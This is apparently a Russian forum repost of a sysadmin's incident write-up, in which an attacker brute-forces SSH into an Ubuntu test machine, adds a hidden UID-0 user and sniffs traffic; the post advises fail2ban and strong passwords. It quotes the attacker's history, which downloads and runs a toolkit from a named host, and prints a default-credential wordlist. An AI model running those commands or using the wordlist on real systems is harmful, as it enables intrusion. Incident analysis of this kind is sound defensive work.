Давно уже наблюдаю весьма интересную картину на своих серверах
(под freebsd, solaris, ubuntu,opensuse и конечно же gentoo)
Постоянно идет брутофорс атака, при чем как выяснилось не на определенные сети, ну скажем не только на рашкинские адреса, но и
на финские и чешские, прозреваю что брутофорсят по всему миру.
А теперь перейду к непосредственно примерам.
Вчера на виртуальной машине убунтовой сменил рутовый пароль
на пароль "test" в надежде того что меня взломают и о чудо в 4.04
сегодня ночью неизвестный проник в систему
Код: Выделить всё
Feb 25 04:04:30 ubuntuserv sshd[26946]: Accepted password for root from 69.125.24.107 port 1199 ssh2
Feb 25 04:04:30 ubuntuserv sshd[26946]: pam_unix(sshd:session): session opened for user root by (uid=0)
Адрес принадлежит провайдеру из USA штат Texas дальше становится еще интереснее
Код: Выделить всё
Feb 25 04:07:00 ubuntuserv passwd[27013]: pam_unix(passwd:chauthtok): password changed for irc
Новый рут сменил пароль на пользователя irc, пользователя такого у меня не было, логов заведения такого я не нашел, видать что-то таки затерли за собой.
Код: Выделить всё
Feb 25 04:07:15 ubuntuserv sshd[27015]: Accepted password for irc from 69.125.24.107 port 1210 ssh2
Feb 25 04:07:15 ubuntuserv sshd[27015]: pam_unix(sshd:session): session opened for user irc by (uid=0)
Следущим действием злоумышленника было заведение пользователя oracle
и такой же группы видимо для маскировки в системе в надежде, что администратор не станет сносить вроде как "системного" пользователя оракл
Код: Выделить всё
Feb 25 04:07:39 ubuntuserv useradd[27071]: new group: name=oracle, GID=1002
Feb 25 04:07:39 ubuntuserv useradd[27071]: new user: name=oracle, UID=0, GID=1002, home=/home/oracle, shell=/bin/sh
Но палево же!Зачем системному юзеру папка в /home ?
Дальше было еще более палевное действие
Код: Выделить всё
Feb 25 04:51:58 ubuntuserv passwd[27155]: pam_unix(passwd:chauthtok): password changed for root
То бишь сменили пароль руту это самая главная ошибка злоумышленника,
сегодня в систему я пытался зайти именно под рутом, тут напрашиваются два вывода: либо кулхацкеры расчитывали на то что администратор будет работать от sudo, так как рутового пароль в бубунте какбе нет, либо они настолько тупые...
/var/log/messages
Код: Выделить всё
Feb 25 04:08:37 ubuntuserv kernel: [369655.619943] device eth0 entered promiscuous mode
Feb 25 04:40:46 ubuntuserv kernel: [371584.196912] device eth0 left promiscuous mode
Feb 25 04:52:56 ubuntuserv kernel: [372314.970670] device eth0 entered promiscuous mode
Feb 25 05:16:21 ubuntuserv kernel: [373719.422946] device eth0 left promiscuous mode
Сетевую карту перевели в промискус мод, для чего такая манипуляция
сказать не могу, так что велком обсуждение со своими предположениями.
А теперь выясним был ли это человек или просто скрипт
last root
Код: Выделить всё
root pts/0 ool-457d186b.dyn Thu Feb 25 04:52 - 06:56 (02:04)
root pts/0 ool-457d186b.dyn Thu Feb 25 04:51 - 04:52 (00:00)
root pts/0 ool-457d186b.dyn Thu Feb 25 04:04 - 04:40 (00:36)
Рут провел в системе 2 часа 40 минут, то есть явно это не скрипт.
Теперь повторюсь еще раз подобные брут-атаки я испытываю на всех своих серверах ежедневно, бывают перерывы по несколько дней но всегда продолжают долбить.
Средства борьбы с пионерами
утилита fail2ban(пакет есть во всех популярных дистрибутивах) после нного количества попыток входа банит айпи на нное время.
Ну и конечно же не ставить простые пароли.
Перепост из моего бложика, думаю будет интересно
UPD
Нашел аналогичную тему на лоре
Там злоумышленник так же проник в систему и на выходе получили точно такие же логи
UPD2
злоумышленник выкачивал вот этот файлик
wget http://mesarce.i-was-in-paris.com/osh.tgz
Код: Выделить всё
125 wget http://mesarce.i-was-in-paris.com/osh.tgz
126 tar zxvf osh.tgz
127 cd osh
128 chmod +x *
129 ./go.sh 90
130 w
Внутри архива есть файлик и вот его содержимое
Код: Выделить всё
root root
root password
root 111111
root 123456
root qwerty
root p@ssw0rd
root pa55w0rd
root passw0rd
root 1q2w3e
root abc123
root abcd1234
root 1234
root redhat
oracle oracle
test test
Я почти вышел на автора этого чуда, если удастся с ним связаться отпишу через пару дней.